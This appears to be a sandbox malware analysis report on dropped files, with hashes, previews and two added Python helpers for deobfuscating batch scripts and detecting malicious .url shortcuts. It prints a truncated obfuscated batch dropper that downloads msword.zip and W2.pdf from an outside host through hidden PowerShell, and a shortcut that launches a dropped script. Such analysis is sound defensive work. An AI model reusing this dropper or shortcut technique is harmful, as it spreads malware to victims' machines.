                                                                                      Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15114
                                                                                      Entropy (8bit):5.316729273655208
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:NEZuRzoFZgx7YKC/Q63eClkJIktcCzzNt2vzx5CS9iriYwDrpE6JBwBT6ASemn/H:+gK
                                                                                      MD5:F7ECED059BA699C6BE049A1C61EF747C
                                                                                      SHA1:37B53094A258CAE052572D9E67002006699FE2C8
                                                                                      SHA-256:A677B415612E28C8C483D3B52BF2B507DF3F39F4257F406A6807F649085370B0
                                                                                      SHA-512:9BA616D5CF2D4BA6F15B99F4705BEF28CBEB76DA5363475A46EEABAA65B5EC48994179255A836E1523FDDE045C8FAC954AFF5FF57C59AD9CFC738595754A369F
                                                                                      Malicious:false
                                                                                      Preview:SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:113-0500 ThreadID=7476 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:115-0500 ThreadID=7476 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:116-0500 ThreadID=7476 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:116-0500 ThreadID=7476 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:116-0500 ThreadID=7476 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29752
                                                                                      Entropy (8bit):5.3912860750047775
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r1:Z
                                                                                      MD5:5FB433C652F45286B8D358C9298B5B87
                                                                                      SHA1:9C520613114E40613A761251BBF643C938D150D5
                                                                                      SHA-256:7EAE589D224D5FFD4EA82CBB43485EDEB9DDD496850A3DCC981EAE6CC85E0323
                                                                                      SHA-512:44EFD08ED1E6E7FDB34BD724AACD138666D7CF9017C154F242A82144B4DBC7C005B018B4C75747A4F042D16FD5CFD1DFCF271969F3E819482D48F6AE561E30A0
                                                                                      Malicious:false
                                                                                      Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                      Category:dropped
                                                                                      Size (bytes):1407294
                                                                                      Entropy (8bit):7.97605879016224
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                      Category:dropped
                                                                                      Size (bytes):386528
                                                                                      Entropy (8bit):7.9736851559892425
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                      Malicious:false
                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                      Category:dropped
                                                                                      Size (bytes):758601
                                                                                      Entropy (8bit):7.98639316555857
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                      Malicious:false
                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                      Category:dropped
                                                                                      Size (bytes):1419751
                                                                                      Entropy (8bit):7.976496077007677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                      MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                      SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                      SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                      SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (904), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3634
                                                                                      Entropy (8bit):5.236008723707643
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:m+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:oCjaob3Z2SnE8tSqCB9Y
                                                                                      MD5:87022BBA9DB0F800B26D9609ACBBCF49
                                                                                      SHA1:D7BE8CC8D4CFFCCE0BD7D361037BBE575E49CC6A
                                                                                      SHA-256:1F6CE0F5CD3793AAEA9B3F9DE99F04679B8DB2F1056532982D835E665006ECE7
                                                                                      SHA-512:B7BE35A7A8EF40CF5326EFD77EB4A2EE05162B241267695C6927F12340BE3720AF299D37AFB5F02025EF8948E71C8A4F8CC21B5C805C9DD777797694C033D53F
                                                                                      Malicious:true
                                                                                      Preview:@%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%..set url=https://myguyapp.com/msword.zip..s%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%rjdee%g%dwYNwJT%u%MoAZng%y%pXoEB%a%Yy%p%UKZM%p%ctS%.%Jnv%c%YYTHkw%o%wkC%m%GFePO%/%jldFiSl%m%IP%s%xK%w%hLcFpDndPO%o%DaOxa%r%ZM%d%AR%.%f%z%GzD%i%e%p%JevMulL%..set url2=https://myguyapp.com/W2.pdf..s%hwvwRF%e%QuDLrd%t%JICNv% %PxorhwP%u%aYH%r%hotHXeBZtg%l%oJKbuFDbgq%2%yHfekdVP%=%NdKRoGUgr%h%xKSx%t%rvRKBSleIX%t%SpSm%p%wbQdk%s%R%:%Dizx%/%HHLDZ%/%es%m%XjoF%y%J%g%olMBNbeo%u%DVZtkXm%y%MsH%a%LyuRF%p%Eryft%p%idiglSH%.%odKAWwiYof%c%CtLK%o%KjljBrysB%m%o%/%GQYaqs%W%LDmDZbmha%2%sFQKV%.%vIMk%p%VuXimjsr%d%acamBo%f%nrMe%..p%wsZX%o%zbulUZgp%w%inxp%e%aiWTgYV%r%KUWANAEWb%s%oDEk%h%gPNeE%e%ibNOiBI%l%LHUUm%l%ETUgg% %jDR%-%GUoW%W%j%i%OZUiVG%n%xC%d%EvHpV%o%BVeSOp%w%kLnyCABxV%S%Xb%t%IKytjHq%y%Pw%l%jYJgLlEn%e%cWXrPRDt% %xRzJFYoSU%H%BYa%i%aNxNnfpSO%d%mJLHttj%d%PEn
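The dropped batch file previewed above hides its commands behind references to environment variables that are never defined. cmd.exe expands every %NAME% in a .bat/.cmd line before executing it, and a name that is not set expands to nothing, so `@%VLuxDxBM%e%zknhtrti%c%qXIe%h%...` runs as `@echo off` and the long obfuscated line that follows the plain `set url=` line is a second copy of the same `set url=https://myguyapp.com/msword.zip`. The Python deobfuscator below is an added example written for this report, not code from the sample or from the sandbox; it replays the expansion with an initially empty environment and records the script's own `set` statements so that genuine references (such as a later `%url%`) are substituted rather than stripped. Its input is the `@echo off` line and the obfuscated `set url=` line copied from the preview, plus one constructed `echo %url%` line that is not on the page.

```python
"""Recover a batch script obfuscated with references to undefined %VARS%.

cmd.exe expands %NAME% in a .bat/.cmd line before running it; an undefined
name expands to the empty string.  The loader interleaves every character
with a reference to a random, undefined name, so replaying the expansion
against an initially empty environment yields the plaintext.  Tracking the
script's own `set` statements keeps real references intact.
"""
from __future__ import annotations

import re

# %NAME% reference; the name may not span a line break.
VAR_RE = re.compile(r"%([^%\r\n]*)%")
# set NAME=VALUE  /  set "NAME=VALUE", optionally prefixed with '@'.
SET_RE = re.compile(r'^\s*@?set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)


def expand_line(line: str, env: dict) -> str:
    """Expand %NAME% references the way cmd.exe does for a batch file.

    `env` maps lower-cased variable names to values (batch names are
    case-insensitive).  A reference to a missing name expands to "".
    """
    def sub(m: re.Match) -> str:
        name = m.group(1)
        if name == "":                      # '%%' is a literal percent sign
            return "%"
        return env.get(name.lower(), "")    # undefined -> empty string
    return VAR_RE.sub(sub, line)


def deobfuscate(script: str) -> tuple[str, dict]:
    """Return the expanded script and the environment it builds while running."""
    env: dict = {}
    out = []
    for raw in script.splitlines():
        line = expand_line(raw, env)        # expansion happens before `set` runs
        out.append(line)
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
    return "\n".join(out), env


# Sample input: first and third lines of the dropped .bat exactly as shown in
# the sandbox preview, plus one constructed line ("echo %url%", not on the
# page) to show that a reference the script itself defined survives.
OBFUSCATED_SET_URL = (
    "s%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%"
    "h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%rjdee%"
    "g%dwYNwJT%u%MoAZng%y%pXoEB%a%Yy%p%UKZM%p%ctS%.%Jnv%c%YYTHkw%o%wkC%m%GFePO%"
    "/%jldFiSl%m%IP%s%xK%w%hLcFpDndPO%o%DaOxa%r%ZM%d%AR%.%f%z%GzD%i%e%p%JevMulL%"
)
SAMPLE = "\r\n".join([
    "@%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%",
    OBFUSCATED_SET_URL,
    "echo %url%",
])


if __name__ == "__main__":
    plain, env = deobfuscate(SAMPLE)
    print(plain)
    print("variables defined by the script:", env)
```

A plain "strip everything between percent signs" pass would also erase `%url%`; keeping a running environment is what makes the recovered script faithful to what cmd.exe executes. The preview is truncated mid-line, so the PowerShell command it ends with is not reconstructed here.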
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3291904
                                                                                      Entropy (8bit):5.7211736584910335
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:1SPkwlaGwxOe3J7k4b6ioP8ZbmrJju41nK4AzaVQeAYgIBlu:10wMe3Lb6R8Zbm59K4PVgI3u
                                                                                      MD5:612EC869CA4C87B5BF6C1B44522FDA28
                                                                                      SHA1:43E7850657B61E9AC7341413C203C6E834266EA7
                                                                                      SHA-256:AB2B6D3C849A207A93CFEC18A684EF980AE681C4F901A3B12858A2C3AC05ECCC
                                                                                      SHA-512:BE5BE0BDB010FB4EA58CED7FB45731FB720B6AFBBDCAA1E971CE9B278CDE71F7C8E73D28A0FA8744F1604FF176A50032D63B9F5850909133CD113E69B2A53EA5
                                                                                      Malicious:true
                                                                                      Preview:PK........n.(Z.............. .msword.exeux.............UT....V~g.e~g.e~g.{|T..?~..dI6.".F..!(...M\..rB.Y\Xw..pQ..+.M....%n..............V."&.$(.(<..|.H...u.......3s6..{.....~.5{...g>...g......A.............o?..+^.*.0.OW....t.....Uu+.[r_..KV.X)..UST..(Z....6..}+..L....6.........t..5.4.=.........K...R+{.b...\.&.(.U.La.....i..c....xIe..tA.P.'.....7.B.......1.C.{..G..O3.Hy.....7......!..._......C...^..8.....r.Z....g.D}....H..O.[.D^".w]....#.....L......[....?.W...+..N. .d.=..&....8..p#L...i..f.Jd..A.../G.W..........P{"=.".v.<.......F*..j...3.h..+N]..M....G...$...:....b.3>..1|....Q.....'..6$#5IA.Y..e.h..b.\........y.Ws<.n...I=.u:^lk.E.<d..t........U/...S9...D...y..........zSz~%..I...q..z.f@.+y....Y..4....G..5..Iz~.J.@s..P..aS.C<N$.!j pA..!..z^H.}..K.<...~H*B...a]j.M.R.b-..;.....h....;..ZUlm.O..e.........f9...er...=.Z_...l/}...l~...n.-3....[.!.ok.+.%.}.N%G....L..D.*2.....;.-.i.q.3G.....nP.bY..P+l......X|.,..v9+.#Za...7.........:b.M.Hv
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):597659152
                                                                                      Entropy (8bit):4.333929871564731
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:2418E6B81076BF97B0D0659309561185
                                                                                      SHA1:5C9393008097E0C2EE82197E46CA879B0156D15D
                                                                                      SHA-256:9DCF3E57C4962A4C5BA0866AF3C16E7D16427448FD75E1D78F7C3D9A70675BFA
                                                                                      SHA-512:339267CBCD9073BD21FEC145814F73D0165FE58F1DB306F2AE678780C691B32C9B9C46C3218848D9EE34BD4A2669B23E6A792735FA5351391B8B33632C3EB54D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8............@....................................#..@.................................4........@...2......................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....2...@...4..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):100
                                                                                      Entropy (8bit):4.889436845812483
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjowkn23mKpkNx5G0y
                                                                                      MD5:A34A0DAF277C13FC5AFF64C0A7247999
                                                                                      SHA1:FD9B47B23BD20B9903D8842AC8C17A9F96677E93
                                                                                      SHA-256:1534FD0EC0B91D4DDD6A250523DEE4BDB80DCBDF9DF1440606B3BF31AB80E814
                                                                                      SHA-512:7B45CB2183C7307EF7C7A89926D2289E5A49C49E53F2A635CFF49FC8898D2D346C686E6DF5F15280A918E6FDA78AE75E97B1769D5536293E75119E3ECDCE0E9A
                                                                                      Malicious:true
                                                                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..
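The Internet shortcut previewed above does not point at a web address: its URL= field is a local path to the dropped LinkHub.js, so activating the shortcut hands the file to the default handler for .js (wscript.exe on a stock Windows install). The check below is an added example, not code from the sample or from the sandbox. It parses the [InternetShortcut] section and flags a URL that resolves to a local script or executable rather than an http(s) target. Where the shortcut was written is not shown in this record; the scan helper's use of the per-user Startup folder is an assumption.

```python
"""Flag .url Internet shortcuts whose target is a local script or binary."""
import re
from pathlib import Path, PureWindowsPath
from typing import List, Optional, Tuple

# Targets the shell hands to a script host or loader instead of a viewer.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
               ".bat", ".cmd", ".ps1", ".exe", ".dll", ".scr", ".lnk"}

# Drive-letter path, UNC path, or file: URL wrapping either.
LOCAL_RE = re.compile(
    r"^(?:file:(?://)?/?)?(?P<path>[a-z]:[\\/].*|\\\\.*)$", re.IGNORECASE)


def parse_url_file(text: str) -> dict:
    """Return key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()                       # preview shows trailing blanks
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip().strip('"')
    return fields


def local_script_target(text: str) -> Optional[str]:
    """Return the local path the shortcut would launch if it is a script/binary."""
    url = parse_url_file(text).get("url", "")
    m = LOCAL_RE.match(url)
    if not m:
        return None                              # ordinary web shortcut
    path = m.group("path")
    # PureWindowsPath understands both separators, whatever host this runs on.
    return path if PureWindowsPath(path).suffix.lower() in SCRIPT_EXTS else None


def scan_folder(folder: Path) -> List[Tuple[str, str]]:
    """List (shortcut, target) pairs for every suspicious .url in `folder`."""
    hits = []
    for f in folder.glob("*.url"):
        target = local_script_target(f.read_text(errors="replace"))
        if target:
            hits.append((str(f), target))
    return hits


# Sample input: the dropped shortcut exactly as shown in the sandbox preview
# (the ".." in the preview are the CRLF line terminators).
SAMPLE = (
    "[InternetShortcut] \r\n"
    "URL=\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.js\" \r\n"
)


if __name__ == "__main__":
    print("sample target:", local_script_target(SAMPLE))
    # Assumed location to check on a live host; not stated in this record.
    startup = Path.home() / "AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
    if startup.is_dir():
        for shortcut, target in scan_folder(startup):
            print(f"{shortcut} -> {target}")
```

Matching on the target's extension rather than on the shortcut's name is the point: the .url itself looks benign to a casual listing, and only the URL= value reveals that it is a launcher for a dropped script.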
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PDF document, version 1.4, 2 pages
                                                                                      Category:dropped
                                                                                      Size (bytes):69437
                                                                                      Entropy (8bit):7.717554924401452
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:fGPGTXkz5QcYykzbvwj42yCuTP1mRPLHLxqf/f8LcivAM7jQlVdl8gbUvjODSrY5:o3z5jkzbvWg1qzndS1zSrpaaW
                                                                                      MD5:296FBCEB79C89BCFFD636CB2D80C57F7
                                                                                      SHA1:7AC0E8C3BBCA5B78289EC48D0785B03DE4E1F581
                                                                                      SHA-256:568CB24BFE35FD292AA0923413E1707B057A281059759AF52FC4392F901A8383
                                                                                      SHA-512:902BB7F56B5E5C49B8798154B5A79B0D820C41308A0BAA1346CBB2FE0C04BB2D6A756D27AF598E59EC0A688FBB19351F42338E58EE6DE2EC8A87566130EE7929
                                                                                      Malicious:true
